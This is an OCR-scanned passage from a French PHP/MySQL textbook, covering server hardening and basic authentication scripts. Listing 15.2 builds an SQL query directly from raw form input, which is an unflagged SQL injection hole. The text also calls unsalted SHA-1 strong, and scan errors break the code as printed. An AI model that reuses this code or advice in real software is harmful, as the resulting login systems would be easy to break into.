de n'autoriser les utilisateurs a se connecter a la base qu'a partir de cette machine. 

De nombreux SGBDR autorisent les connexions chiffrees (generalement via SSL). Si vous 
devez vous connecter a un SGBDR depuis Internet, utilisez ce type de connexion s'il est 
disponible. Sinon vous pouvez passer par un tunnel qui permet d'effectuer une connexion 
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securisee entre deux machines : le principe consiste a creer une connexion securisee dans 
laquelle on passe ensuite les autres connexions (comme HTTP ou SMTP). 

Enfin, assurez-vous que le SGBDR a ete configure pour traiter plus de connexions que le 
serveur web et PHP ne pourront lancer. Nous avons explique plus haut qu' Apache 1.3.x, 
par defaut, pouvait lancer 1 50 serveurs ; le nombre de connexions autorisees par defaut 
dans le fichier my.ini de MySQL etant de 1 00, votre configuration est deja incorrecte. 

Pour corriger ce probleme, il suffit de modifier le fichier my.ini : 
max_connections=151 

Nous avons ajoute une connexion supplemental car MySQL garde toujours une de 
ces connexions pour l'administrateur. Meme si le serveur est totalement charge, 1' admi- 
nistrates de la base pourra done quand meme se connecter. 

Execution du serveur 

Pour 1' execution du SGBDR, vous pouvez prendre quelques mesures pour assurer sa 
securite. Avant tout, il ne devrait jamais s'executer sous le compte de l'administrateur 
du systeme (root avec Unix, administrateur avec Windows). En effet, s'il est 
compromis, e'est tout le systeme qui serait en detresse. En fait, MySQL refuse de 
s'executer lorsqu'il est lance sous ce compte, sauf si vous le forcez a le faire (ce qui 
serait vraiment une tres mauvaise idee). 

Apres avoir configure le SGBDR, la plupart des programmes exigeront que vous 
modifiiez le proprietaire et les permissions des repertoires et des fichiers de la base 
pour les proteger des yeux indiscrets. Assurez-vous de le faire et que ces fichiers ne 
restent pas la propriete de l'administrateur systeme ; sinon le processus du serveur 
(qui ne tourne pas sous le compte du superutilisateur) ne pourrait meme pas ecrire 
dans ses propres fichiers. 

Enfin, lorsque vous travaillez avec le systeme de permissions et d'authentification, 
creez les utilisateurs avec le moins de permissions possible. Au lieu de leur octroyer un 
large ensemble de droits "parce qu'ils pourraient en avoir besoin un jour", donnez-leur 
le minimum de permissions et n'ajoutez les autres que quand cela devient absolument 
necessaire. 

Proteger le reseau 

Vous disposez de quelques moyens pour securiser le reseau sur lequel se trouve votre 
application web. Bien que les details exacts depassent le cadre de ce livre, ils sont rela- 
tivement simples a comprendre et ils ne protegeront pas que vos applications web. 
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Installation de pare-feux 

Tout comme Ton doit filtrer les donnees qui parviennent a notre application PHP, nous 
devons egalement filtrer tout le trafic qui arrive sur notre reseau, que ce soit dans nos 
bureaux ou dans un data center qui heberge nos serveurs et nos applications. 

Pour ce faire, on utilise un pare-feu, qui peut etre un logiciel s' executant sur un systeme 
d' exploitation comme FreeBSD, Linux ou Windows, ou un materiel dedie. Le travail 
d'un pare-feu consiste a eliminer le trafic indesirable et a bloquer l'acces aux parties 
d'un reseau que Ton veut isoler. 

Le protocole TCP/IP sur lequel repose Internet utilise des ports, chacun d'eux etant 
dedie a un type de trafic particulier (HTTP, par exemple, utilise le port 80). Un grand 
nombre de ports servent strictement au trafic interne et ont peu d'utilite dans les interac- 
tions avec le monde exterieur. En interdisant le trafic d'entrer et de sortir de notre reseau 
par ces ports, nous reduisons le risque que nos ordinateurs ou nos serveurs (et done nos 
applications web) soient attaques. 

Utilisation d'une DMZ 

Comme nous l'avons deja evoque dans ce chapitre, nos serveurs et nos applications web 
courent le risque d'etre attaques non seulement de l'exterieur, mais egalement par des utili- 
sateurs internes. Bien que ces derniers soient moins nombreux, ils ont souvent la possibilite 
de causer plus de degats puisqu'ils connaissent bien le fonctionnement de leur societe. 

Un moyen de limiter ce risque consiste a mettre en place une zone demilitarisee 
(DMZ). On peut ainsi isoler les serveurs qui executent nos applications web (et les 
autres, comme les serveurs de courrier de la societe) a la fois du monde exterieur et du 
reseau interne, comme le montre la Figure 14.3. 
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Figure 14.3 

Mise en place d'une zone demilitarisee (DMZ). 
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Les DMZ ont deux avantages essentiels : 

■ lis protegent les serveurs et les applications des attaques provenant de l'interieur et 
de l'exterieur de votre reseau. 

■ lis protegent votre reseau interne en placant des couches supplementaires de pare- 
feux et plus de securite entre votre reseau et Internet. 

La conception, 1' installation et la maintenance d'une DMZ doit etre entreprise avec les 
administrateurs reseau de l'endroit ou vous hebergez votre application web. 

Preparation contre les attaques DoS et DDoS 

Les attaques par deni de service (DoS) font partie des attaques actuelles les plus 
effrayantes. Les attaques DoS et leurs versions distribuees encore plus alarmantes 
(DDoS) utilisent des ordinateurs infectes, des vers ou tout autre moyen pour exploiter 
les faiblesses des installations des logiciels, voire celles inherentes a la conception de 
certains protocoles comme TCP/IP. Elles saturent alors un ordinateur et l'empechent de 
repondre aux requetes de connexion emanant de ses clients legitimes. 

Ce type d'attaque, malheureusement, est tres difficile a prevoir et a contrer. Certains 
constructeurs de materiel reseau vendent des equipements permettant de limiter les 
risques et les effets des attaques DoS, mais ce ne sont pas encore des solutions radicales. 

Votre administrateur devrait au moins chercher a comprendre la nature du probleme et 
les risques auxquels sont exposes votre reseau et vos installations. Ajoute aux echanges 
avec votre FAI (ou tout organisme qui heberge les machines de votre FAI), cela vous 
preparer a au cas ou une attaque de ce type se presente. Meme si cette attaque n'est pas 
directement dirigee contre vos serveurs, ils peuvent quand meme s'en retrouver les 
victimes. 

Securite des ordinateurs et du systeme d'exploitation 

Noue devons egalement nous soucier de 1' ordinateur sur lequel s' execute 1' application 
web. Pour cela, vous pouvez et devez verifier quelques points essentiels. 

Maintenir a jour le systeme d'exploitation 

Lun des moyens les plus simples de maintenir la securite de votre ordinateur consiste a 
faire en sorte que son systeme d'exploitation soit toujours a jour. Des que vous avez 
choisi un systeme d'exploitation particulier pour votre environnement de production, 
vous devriez prevoir d'y effectuer des mises a jour et d'y appliquer les correctifs de 
securite. Vous devriez egalement consulter periodiquement certaines sources pour y 
rechercher les nouvelles alertes, les correctifs ou les mises a jour. 
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Ces sources dependent du systeme d' exploitation. Generalement, vous les trouverez 
aupres de l'editeur de ce systeme, surtout s'il s'agit de Windows, d'un Linux vendu par 
Red Hat ou SuSE ou de Solaris. Pour les autres, comme FreeBSD, Linux Ubuntu ou 
OpenBSD, il faut generalement consulter leurs sites respectifs pour prendre connais- 
sance des derniers correctifs conseilles. 

Comme pour toutes les mises a jour de logiciels, vous devriez disposer d'un environne- 
ment ou tester 1' application de ces correctifs et verifier qu'ils s'installent correctement 
avant de les appliquer aux serveurs en production. Cela permet egalement de tester que 
ces modifications ne perturbent pas votre application avant que le probleme ne 
survienne sur vos serveurs. 

La mise en place de certains correctifs depend evidemment de vous : si un correctif de 
securite concerne le sous-systeme Firewire et que votre ordinateur n'en est pas pourvu, 
cela ne vaut peut-etre pas la peine de perdre du temps a le deployer. 

Ne lancer que ce qui est necessaire 

L'un des problemes que rencontrent de nombreux serveurs est celui du grand nombre 
de programmes qu'ils executent : serveurs de courrier, serveurs FTP, possibilite 
d'echanger des donnees avec le systeme de fichiers de Windows (via le protocole 
SMB), etc. Pour vos applications web, vous n'aurez souvent besoin que du serveur web 
(IIS ou Apache), de PHP avec ses bibliotheques et d'un SGBDR. 

Si vous n'utilisez rien d' autre, eteignez les services inutiles et desactivez-les une fois 
pour toutes. Vous n'aurez ainsi plus besoin de vous soucier de leur securite. Les utilisa- 
teurs de Windows 2000 et XP peuvent parcourir la liste des services executes par leur 
serveur et couper ceux qui ne sont pas utiles. En cas de doute, faites quelques recher- 
ches car il est fortement probable que quelqu'un d'autre ait deja demande ce que fait un 
service donne et s'il est necessaire. 

Securiser physiquement le serveur 

Nous avons deja mentionne qu'une des attaques contre la securite consiste simplement 
a entrer dans vos bureaux, a debrancher le serveur et a partir avec. Ce n'est malheureu- 
sement pas une plaisanterie. Un serveur moyen n'etant pas un materiel particulierement 
donne, les motivations du voleur ne sont pas forcement d'espionner un concurrent ou de 
voler une propriete intellectuelle. Certains volent simplement les ordinateurs pour les 
revendre. 

II est done essentiel que les serveurs qui executent vos applications web se trouvent 
dans un environnement securise auquel seules les personnes autorisees auront acces. 
Une politique specifique permettra en outre d'octroyer ou de supprimer ce droit d'acces 
aux differentes personnes. 
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Se preparer aux desastres 

Si vous voulez voir un visage livide, demandez a votre responsable informatique ce qui 
arriverait a vos serveurs ou, bien sur, a tout le data center si l'immeuble qui les heberge 
etait detruit par un incendie ou un tremblement de terre. Vous verrez qu'un bon 
pourcentage d'entre eux n'auront aucune reponse. 

Bien qu'elle soit souvent ignoree, la preparation aux desastres (et a leur reparation) est 
une partie critique de l'execution d'un service, qu'il s'agisse d'une application web ou 
de toute autre chose (dont les operations quotidiennes de votre travail). Cette prepara- 
tion consiste generalement en un ensemble de documents ou de procedures qui ont ete 
repetees et qui consistent a repondre aux questions lorsqu'une des situations suivantes 
(entre autres) survient : 

■ Des parties de votre data center ont ete detruites au cours d'une catastrophe. 

■ Votre equipe de developpement est partie dejeuner et a ete renversee par un bus et 
serieusement blessee (voire tuee). 

■ Les bureaux de la direction de votre societe ont brule. 

■ Un pirate ou un employe mecontent a reussi a detruire toutes les donnees sur les 
serveurs de vos applications web. 

Bien que la plupart des gens n'aiment pas evoquer les desastres et les attaques, la dure 
realite fait que ces situations arrivent (heureusement, assez rarement). Les entreprises, 
cependant, ne peuvent pas se payer le luxe de rester figees lorsqu'un evenement de cette 
importance survient et qu'elles n'y sont pas preparees. Une societe ayant un chiffre 
d'affaires quotidien de plusieurs millions d' euros serait devastee si ses applications web 
ne fonctionnaient plus pendant plus d'une semaine. 

En se preparant a ces evenements, en les anticipant avec des plans d' actions clairs et en 
repetant certaines parties critiques, un petit investissement financier peut economiser a 
notre entreprise des pertes eventuellement desastreuses si un veritable probleme survenait 
un jour. 

Voici certaines des mesures qui pourront vous aider a preparer les desastres et a les 
reparer : 

■ Assurez-vous que toutes les donnees sont sauvegardees quotidiennement et que les 
sauvegardes sont stockees sur un autre site. Si votre data center est detruit, vous 
disposerez encore des donnees. 

■ Ecrivez des scripts, egalement ailleurs que sur le site, expliquant comment recreer 
les environnements des serveurs et configurer 1' application web. Faites au moins 
une repetition de ces procedures de reconfiguration. 
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■ Conservez une copie complete du code source necessaire a votre application web, 
egalement stockee ailleurs que sur le site. 

■ Pour les equipes importantes, interdisez que tous les membres de l'equipe se depla- 
cent dans le meme vehicule (voiture ou avion) ami qu'il y ait moins de consequences 
en cas d' accident. 

■ Utilisez des outils automatiques pour surveiller le fonctionnement du serveur et 
designez un "operateur d'urgence" qui devra se rendre dans les locaux lorsqu'un 
probleme survient, meme en dehors des heures de bureau. 

a Mettez en place un accord avec un fournisseur afin de disposer immediatement de 
nouveaux materiels si votre data center est detruit. II serait assez frustrant de devoir 
attendre 4 a 6 semaines pour recevoir de nouveaux serveurs. 

Pour la suite 

Au Chapitre 15, nous etudierons plus en detail 1' authentification des utilisateurs. Nous 
presenterons plusieurs methodes differentes dont l'utilisation de PHP et de MySQL 
pour authentifier les visiteurs. 



15 



Authentification avec PHP 

et MySQL 



Ce chapitre explique comment implementer differentes techniques d' authentification 
des utilisateurs a l'aide de PHP et de MySQL. 

Identification des visiteurs 

Bien que le Web soit un support relativement anonyme, il est souvent interessant de 
savoir qui visite votre site. Heureusement pour la confidentialite des utilisateurs, il 
n'est possible de deviner que peu d' informations personnelles sans leur accord 
explicite. 

Avec un peu de travail, les serveurs peuvent determiner plusieurs informations sur les 
ordinateurs et les reseaux qui tentent de s'y connecter. Les navigateurs web ont l'habi- 
tude de s' identifier en fournissant aux serveurs leur nom, leur numero de version et le 
nom de votre systeme d'exploitation. Vous pouvez egalement determiner la resolution 
et le nombre de couleurs de l'ecran de vos visiteurs, ainsi que la largeur de leur ecran de 
navigateur grace a du code JavaScript. 

Chaque ordinateur connecte a Internet possede une adresse IP qui lui est propre. 
A partir de 1' adresse IP d'un visiteur, vous pouvez decouvrir certaines informations 
le concernant : il est ainsi possible de savoir a qui appartient une certaine adresse IP 
et, avec un peu de chance et quelques suppositions, a quel endroit cette personne se 
trouve. Certaines adresses sont plus utiles que d'autres. Generalement, les personnes 
disposant d'une connexion permanente a Internet possedent une adresse IP fixe, 
mais les personnes qui doivent se connecter par modem a leur fournisseur d'acces a 
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Internet se voient affecter temporairement l'une des adresses IP de leur fournisseur. 
La prochaine fois que vous verrez cette adresse, il est done fort probable qu'elle appar- 
tienne a un autre ordinateur. En realite, les adresses IP ne sont pas aussi utiles qu'elles 
y paraissent au premier abord pour identifier des utilisateurs. 

Heureusement pour les utilisateurs du Web, aucune des informations fournies par leur 
navigateur ne permet de les identifier. Si vous souhaitez connaitre le nom (ou d'autres 
details personnels) d'un utilisateur, vous devrez le lui demander. 

Plusieurs sites web obligent ou, tout du moins, encouragent fortement leurs utilisa- 
teurs a fournir ces informations. Ainsi, le site du New York Times (http://www.nyti- 
mes.com) propose gratuitement le contenu de son journal, mais uniquement aux 
personnes qui acceptent d'indiquer leur nom, leur sexe et leur revenu global. Le site 
d'information et de discussion pour informaticiens Slashdot (http://www.slas- 
hdot.org) permet aux utilisateurs inscrits de participer a des discussions sous un 
pseudonyme et de personnaliser 1' interface. La plupart des sites de commerce elec- 
tronique enregistrent des informations sur leurs clients lors de leur premier enregis- 
trement, afin qu'ils n'aient plus besoin de saisir a nouveau toutes ces informations 
lors de leurs visites ulterieures. 

Apres avoir demande et recu les informations concernant l'un de vos visiteurs, vous 
avez besoin d'un moyen d'associer ces informations au meme utilisateur la prochaine 
fois qu'il viendra sur votre site. Si vous partez de l'hypothese qu'une seule personne 
visite votre site avec un compte donne et que chaque visiteur ne se sert que d'un seul 
ordinateur, vous pouvez enregistrer un cookie sur 1' ordinateur de cette personne pour 
1' identifier. Ces suppositions ne sont certainement pas vraies pour tout le monde, 
puisqu'il arrive sou vent que plusieurs personnes partagent un meme ordinateur et 
qu'une meme personne se serve de plusieurs ordinateurs. II arrivera done que vous ayez 
besoin de demander a vos utilisateurs de s' identifier a nouveau. Vous devrez en plus 
leur demander de prouver leur identite. 

Le fait de demander a un utilisateur de prouver son identite s'appelle une authentifica- 
tion. La methode d'authentification la plus courante sur le Web consiste a demander aux 
utilisateurs de fournir un nom d'utilisateur et un mot de passe valides. L'authentifica- 
tion permet egalement d'autoriser ou d'interdire Faeces a certaines pages ou a certaines 
ressources, mais elle peut etre facultative ou encore utilisee dans d'autres buts, comme 
la personnalisation d'un site. 
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Implementer un controle d'acces 

II est facile d' implementer un controle simple des acces. L' execution du code presente 
dans le Listing 15.1 peut produire trois pages possibles. Si le fichier est charge sans 
parametre, il affiche un formulaire HTML demandant un nom d'utilisateur et un mot de 
passe. Ce formulaire est presente a la Figure 15.1. 



Moziila Firefox 


( — ) 




d 


Connectez-vous 




Ccrte page est secrete. 




Nom : 








Mot de passe : [~~ 




( Connexion} 









Figure 15.1 

Ce formulaire HTML demande aux visiteurs de saisir un nom d'utilisateur et un mot de passe 
pour acceder au site. 

Si des parametres sont fournis, mais qu'ils ne soient pas corrects, le programme affiche 
un message d'erreur (voir Figure 15.2). 



Q Moziila Firefox 


CD 




(I 


Fichez le camp I 




Vous n'avcz pas lc droit dc venir ici. 




Termine 





Figure 15.2 

Lorsqu'un utilisateur saisit des informations erronees, il faut afficher un message d'erreur. 
Sur un site reel, vous pouvez choisir un message plus sympathique. 
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Si ces parametres sont presents et corrects, le programme affiche un contenu secret 
(voir Figure 15.3). 



Mozilla Firefox 

(TF> (e) CD (uZuz)- (Eg) d 
Bienvenue ! 

Jc pcnsc que vous 6tcs content dc voir ccttc page sccrfetc. 



Termine ^ 

Figure 15.3 

Lorsque les visiteurs fournissent des informations correctes, le script affiche la page de contenu 
confidentielle. 

Listing 15.1 : secret.php — Un mecanisme d'authentification avec PHP et HTML 



<?php 

// Creation de variables aux noms abreges 
$nom = $_P0ST[ ' nom ' ] ; 
$mdp = $_P0ST[ 1 mdp 1 ] ; 

if( ( !isset($nom) ) || ( !isset($mdp) ) ) { 

// Le visiteur doit entrer un nom et un mot de passe 

?> 

<h1 >Connectez-vous</h1 > 

<p>Cette page est secrete. </p> 

<form method="post" action="secret .php"> 
<p>Nom : <input type="text" name="nom"></p> 
<p>Mot de passe : <input type="password" name="mdp"></p> 
<p><input type="submit" name="submit" value="Connexion"></p> 

</f orm> 
<?php 

} else if(($nom == "utilisateur-1 " ) && ($mdp == "secret")) { 
// La combinaison nom/mot de passe est correcte 
echo "<h1>Bienvenue !</h1> 

<p>Je pense que vous etes content de voir cette page 
secrete. </p>"; 

} else { 

//La combinaison nom/mot de passe est incorrecte 
echo "<h1>Fichez le camp !</h1> 

<p>Vous n'avez pas le droit de venir ici.</p>"; 

} 
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Le code du Listing 15.1 fournit un mecanisme d'authentification simple permettant 
aux utilisateurs autorises de voir le contenu d'une page, mais il pose plusieurs 
problemes. 

En effet, ce script : 

■ contient un nom d'utilisateur et un mot de passe codes directement dans son code 
source ; 

■ enregistre le mot de passe en clair ; 

■ ne protege qu'une seule page ; 

■ transmet le mot de passe en clair. 

Ces problemes peuvent etre resolus de differentes manieres. 
Stockage des mots de passe 

II existe de bien meilleurs endroits qu'un script pour stacker les noms d'utilisateur et les 
mots de passe. Dans un script, les donnees sont difficiles a modifier. II est toujours 
possible d'ecrire un script pour modifier soi-meme ses donnees, mais cela n'est genera- 
lement pas une bonne idee car cela signifie que vous possedez un script sur votre 
serveur, execute sur votre serveur et accessible en denture pour tout le monde. Le 
stockage de ces informations dans un autre fichier de votre serveur vous permet d'ecrire 
plus facilement un programme ajoutant ou supprimant des utilisateurs et modifiant leur 
mot de passe. 

Avec un script ou tout autre fichier de donnees, le nombre d'utilisateurs que vous 
pouvez stocker sans affecter serieusement les performances du script est assez limite. Si 
vous avez 1' intention d'enregistrer un grand nombre d' elements dans un fichier pour 
pouvoir les parcourir ulterieurement, il est preferable d'utiliser une base de donnees, 
comme nous l'avons deja vu. D'une maniere generale, si vous possedez une liste de 
plus de cent elements, il vaut mieux les placer dans une base de donnees que dans un 
fichier plat. 

L'utilisation d'une base de donnees pour enregistrer les noms d'utilisateurs et les mots 
de passe ne complique pas beaucoup le script et vous permet d'authentifier tres rapide- 
ment plusieurs utilisateurs differents. Ce precede permet egalement d'ecrire facilement 
un script ajoutant de nouveaux utilisateurs ou en supprimant d'autres, et qui donne aux 
utilisateurs la possibilite de modifier leur mot de passe. 

Le Listing 15.2 presente un script permettant d'authentifier les visiteurs d'une page 
avec une base de donnees. 
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Listing 15.2 : secretdb.php — Utilisation de MySQL pour ameliorer notre systeme 
d'authentification 



<?php 

$nom = $_P0ST[ ' nom 1 ] ; 
$mdp = $_P0ST[ 1 mdp 1 ] ; 

if ( ( !isset($nom) ) || ( ! isset ($mdp) ) ) { 

// Les visiteurs doivent entrer un nom et un mot de passe 

?> 

<h1 >Connectez-vous</h1 > 

<p>Cette page est secrete. </p> 

<form method="post" action="secretdb.php"> 

<p>Nom : <input type="text" name="nom"></p> 

<p>Mot de passe : <input type="password" name="mdp"></p> 

<p><input type="submit" name="submit" value="Connexion"></p> 

</f orm> 

<?php 
} else { 

// Connexion a MySQL 

$mysql = mysqli_connect( "localhost" , "authweb", "authweb"); 
if ( !$mysql) { 

echo "Impossible de se connecter a la base."; 

exit; 

} 

// Choix de la base 

$base = mysqli_select_db($mysql, "auth"); 
if(!$base) { 

echo "Impossible de trouver la base."; 

exit; 

} 

// Interroge la base pour trouver un enregistrement qui correspond. 
$requete = "select count(*) from utilisateurs_ok where 

nom = 1 " . $nom . " ' and 

mdp = 1 " . $mdp . ; 

$resultat = mysqli_query ($mysql, $requete) ; 
if ( !$resultat) { 

echo "Impossible d'executer la requete."; 

exit; 

} 

$ligne = mysqli_fetch_row($resultat) ; 
$nbre = $ligne[0] ; 

if ($nbre > 0) { 

// La combinaison nom/mdp est correcte 
echo "<h1>Bienvenue !</h1> 

<p>Je pense que vous etes content de voir cette page 
secrete. </p>"; 

} else { 

// La combinaison nom/mot de passe est incorrecte 
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echo "<h1>Fichez le camp !</h1> 

<p>Vous n'avez pas le droit de venir ici.</p>"; 

} 

} 

?> 



La base de donnees que nous utilisons peut etre creee en ouvrant une session MySQL 
sous le compte de l'utilisateur root et en executant le contenu du Listing 15.3. 

Listing 15.3 : creeauthdb.sql — Requites MySQL pour creer la base de donnees auth, 
la table utilisateurs_ok et deux utilisateurs 

create database auth; 
use auth; 

create table utilisateurs_ok ( nom varchar(20), 

mdp varchar(40) , 
primary key(nom) 

); 

insert into utilisateurs_ok values ( ' utilisateurl ' , 

'secret' ); 

insert into utilisateurs_ok values ( ' utilisateur2 ' , 

shal (' secret ' ) ); 

grant select on auth.* 

to 'authweb' 

identified by 'authweb'; 
flush privileges; 



Chiffrement des mots de passe 

Que nous enregistrions nos donnees dans une base de donnees ou dans un fichier, il vaut 
mieux eviter de stocker les mots de passe en clair. Un algorithme de hachage non rever- 
sible permet d'ameliorer la securite d'une maniere tres simple. 

PHP propose un certain nombre de fonctions de hachage non reversibles. La plus ancienne 
et la moins securisee est l'algorithme Unix Crypt, fourni par la fonction crypt ( ) . Lalgo- 
rithme MD5 (Message Digest), implemente dans la fonction md5 ( ) , est plus fort. 

SHA-1 (Secure Hash Algorithm) est encore plus sur. La fonction PHP shal ( ) est une 
fonction de hachage cryptographique non reversible forte. Son prototype est le suivant : 

string shal (string chaine [, bool sortie_brute] ) 

A partir de la chaine chaine, cette fonction renvoie une chaine pseudo-aleatoire de 
quarante caracteres. Si sortie brute vaut true, elle renvoie une chaine de vingt carac- 
teres de donnees binaires. Par exemple, a partir de la chaine "secret", shal ( ) renvoie 
"e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4". Cette chaine ne pouvant pas etre 
dechiffree et retransformee en "secret " , meme par son createur, son interet peut ne pas 
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sembler evident. La caracteristique la plus interessante de shal ( ) est que sa sortie est 
deterministe, c'est-a-dire que, pour une chaine et une cle de chiffrement donnees, 
shal ( ) renverra toujours le meme resultat. 

A la place de ce code PHP : 

if (($nom == 'utilisateuM ' ) && 
($mdp == ' secret ' ) ) { 
// OK la combinaison est correcte 

} 

mieux vaut choisir celui-ci : 

if (($name == ' utilisateuM ' ) && 

(sha1($mdp )== 1 e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4' ) ) { 
// OK la combinaison est correcte 

} 

Nous n'avons pas besoin de connaitre le mot de passe qui a ete transforme avec 
shal ( ) : il suffit de comparer les deux mots de passe chiffres. 

Comme nous l'avons deja vu, au lieu de coder directement dans un script les noms des 
utilisateurs et les mots de passe associes, il est preferable de stacker ceux-ci dans un 
fichier separe ou dans une base de donnees. 

Si nous utilisons une base de donnees MySQL pour enregistrer nos donnees d'authenti- 
fication, nous pouvons nous servir de la fonction PHP shal ( ) ou de la fonction MySQL 
SHA1 ( ) . MySQL fournit une gamme encore plus etendue d'algorithmes de hachage que 
PHP, mais ils ont tous le meme but. 

Pour utiliser SHA1 (), nous pouvons reecrire la requete SQL du Listing 15.2 comme 
ceci : 

$requete = "select count(*) from utilisateurs_ok where 
nom = 1 " . $nom . " ' and 
mdp = shal ( 1 " . $mdp . " ' ) " ; 

Cette requete compte le nombre de lignes de la table utilisateurs ok dont la valeur 
de la colonne nom correspond au contenu de $nom et dont la valeur de la colonne mdp est 
identique au resultat de SHA1 ( ) appliquee au contenu de $mdp. En supposant que nous 
obligeons nos utilisateurs a choisir des noms d'utilisateur uniques, le resultat de cette 
requete est soit 0, soit 1 . 

Gardez a 1' esprit que les fonctions de hachage renvoient generalement des donnees de 
taille fixe. Dans le cas de SHA1, il s'agit de quarante caracteres avec une representation 
sous forme de chaine ; par consequent, assurez-vous que la colonne de votre table fait 
cette taille. 
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Si vous reexaminez le Listing 15.3, vous constaterez que nous avons cree un utilisateur 
avec un mot de passe non chiffre ( ' utilisateuM 1 ) et un autre utilisateur avec un mot 
de passe chiffre ('utilisateur2') afin d'illustrer les deux approches. 

Proteger plusieurs pages 

La creation d'un script de ce genre pour proteger plusieurs pages est un peu plus 
complexe. Comme le protocole HTTP est un protocole sans etat, il n'existe aucun lien 
automatique ni aucune association entre les differentes requetes provenant d'une meme 
personne. II est done assez difficile de conserver des informations d' authentification 
entre differentes pages. 

Le moyen le plus simple de proteger plusieurs pages consiste a utiliser les mecanismes de 
controle d'acces fournis par votre serveur web. Nous allons les passer rapidement en revue. 

Pour creer nous-memes cette fonctionnalite, il faut inclure certaines parties du script 
presente dans le Listing 15.1 dans chaque page que vous souhaitez proteger. En utili- 
sant auto prepend file et auto append file, nous pouvons completer automatique- 
ment le code necessaire pour chaque fichier, dans chaque repertoire. L utilisation de ces 
directives a ete presentee au Chapitre 5. 

Si nous choisissons cette approche, que se passera-t-il lorsque nos visiteurs parcoure- 
ront plusieurs pages de notre site ? II est inenvisageable de leur demander de saisir a 
nouveau leur nom et leur mot de passe pour chaque page a afficher. 

Nous pourrions ajouter les informations qu'ils ont saisies dans chaque lien hypertexte 
de la page. Comme les noms d'utilisateurs peuvent contenir des espaces ou d'autres 
caracteres interdits dans les URL, nous devons nous servir de la fonction urlencode( ) 
pour coder correctement ces caracteres. 

Cependant, cette approche cree egalement quelques problemes. En effet, comme les 
donnees d' authentification sont incluses dans les pages web envoyees a 1' utilisateur, 
elles seront visibles dans l'historique du navigateur. En outre, ces donnees etant echan- 
gees entre le navigateur et le serveur pour chaque page demandee, elles sont transmises 
beaucoup plus souvent qu'il n'est necessaire. 

II existe deux methodes interessantes pour resoudre ces problemes : les sessions et 
1' authentification de base du protocole HTTP. L authentification de base permet de 
resoudre le probleme de l'historique, mais le navigateur envoie toujours le mot de passe 
au serveur lors de chaque requete. Le mecanisme de controle par le biais des sessions 
permet de resoudre ces deux problemes. Nous allons maintenant nous interesser au 
mecanisme d' authentification de base du protocole HTTP, puis nous reviendrons sur le 
controle de session au Chapitre 21 puis plus en detail au Chapitre 25, "Authentification 
des utilisateurs et personnalisation". 
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Authentification de base 

Heureusement, 1' authentification des utilisateurs etant une tache tres courante, le proto- 
cole HTTP integre cette fonction. Les scripts et les serveurs web peuvent demander une 
authentification a un navigateur web qui se charge alors d'afficher une boite de dialogue 
ou une fenetre pour demander a l'utilisateur les informations necessaries. 

Bien que le serveur web redemande les details d' authentification pour chaque requete 
d'utilisateur, le navigateur web n'a pas besoin de demander ces informations a l'utilisa- 
teur pour chaque page car il memorise generalement ces informations tant qu'une fene- 
tre de navigation reste ouverte et les renvoie automatiquement au serveur web sans les 
redemander a l'utilisateur. 

Cette caracteristique du protocole HTTP est appelee authentification de base. Vous 
pouvez l'activer avec PHP ou en utilisant les mecanismes integres dans votre serveur 
web. Nous allons d' abord presenter sa mise en ceuvre avec PHP, puis avec Apache. 

L' authentification de base n'est pas tres sure puisqu'elle transmet le nom de l'utilisateur 
et son mot de passe en clair. Le protocole HTTP 1 . 1 definit une methode plus securisee, 
appelee authentification digest, qui se sert d'un algorithme de hachage (generalement 
MD5) pour cacher les details de cette transaction. L' authentification digest est prise en 
charge par de nombreux serveurs web et par la plupart des navigateurs actuels. Cepen- 
dant, il existe un grand nombre d'anciens navigateurs toujours en usage qui ne prennent 
pas en charge 1' authentification digest et en proposent une version dans certaines 
versions d'lnternet Explorer et d'lnternet Information Server qui est incompatible avec 
les produits non Microsoft. 

Outre qu'elle n'est pas disponible pour un nombre significatif de navigateurs web, 
1' authentification digest n'est pas non plus tres securisee. On considere generalement 
que 1' authentification de base, comme 1' authentification digest, fournit un faible niveau 
de securite. Aucune d'entre elles ne donne a l'utilisateur l'assurance qu'il communique 
bien avec l'ordinateur auquel il avait l'intention d'acceder, ce qui permet done a un 
pirate d'intercepter la requete avant de la renvoyer au vrai serveur. L' authentification de 
base transmettant le mot de passe de l'utilisateur en clair, elle permet a n'importe quel 
pirate capable de capturer les paquets de se faire passer pour n'importe quel utilisateur. 

L' authentification de base fournit done un niveau de securite assez faible, comparable a 
celui qui est utilise traditionnellement pour se connecter a des ordinateurs via telnet ou 
FTP, puisque ces deux protocoles transmettent egalement les mots de passe en clair. 
L' authentification digest est un peu plus securisee, puisqu'elle chiffre les mots de passe 
avant de les transmettre. 

Lorsque vous combinez 1' authentification de base avec SSL et les certificats numeri- 
ques, toutes les parties d'une transaction web peuvent etre protegees d'une maniere 
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fiable. Si vous avez besoin d'une securite forte, consultez le Chapitre 16. Cependant, 
dans la plupart des cas, une methode relativement rapide et peu securisee (comme 
1' authentification de base) est suffisante. 

L' authentification de base permet de proteger un espace nomine en demandant aux 
utilisateurs de fournir un nom d'utilisateur et un mot de passe valides. Ces espaces 
securises possedent chacun un nom pour qu'il puisse en exister plusieurs sur un meme 
serveur. Differents fichiers ou repertoires d'un meme serveur peuvent appartenir a 
differents espaces securises, chacun etant protege par un nom d'utilisateur et un mot de 
passe differents. Les espaces securises permettent egalement de regrouper plusieurs 
repertoires sur le meme hote pour les proteger avec un seul mot de passe. 

Utiliser I'authentification de base avec PHP 

Les scripts PHP sont en general compatibles entre les differentes plates-formes, mais 1' utili- 
sation de 1' authentification de base utilise des variables d'environnement definies par le 
serveur. Pour qu'un script PHP puisse mettre en ceuvre 1' authentification HTTP sur Apache 
(avec PHP execute sous la forme d'un module Apache) ou sur IIS (avec PHP execute sous 
la forme d'un module ISAPI), il doit done detecter le type du serveur et se comporter en 
consequence. Le script du Listing 15.4 peut etre execute sur ces deux serveurs. 

Listing 15.4 : http.php — Mise en oeuvre de I'authentification de base HTTP avec PHP 



<?php 

// Si on utilise IIS, on doit initialiser 
// $_SERVER[ ' PHP_AUTH_USER ' ] et 
/ / $_SERVER [ ' PHP_AUTH_PW ' ] 

if ( (substr($_SERVER[ ' SERVER_SOFTWARE ' ] , 0, 9) == 'Microsoft') && 
( !isset($_SERVER[ ' PHP_AUTH_USER ' ] ) ) && 
( !isset($_SERVER[ ' PHP_AUTH_PW ] ) ) && 

(substr ($_SERVER[ ' HTTP_AUTHORIZATION ' ] , 0, 6) == 'Basic ') 
) { 

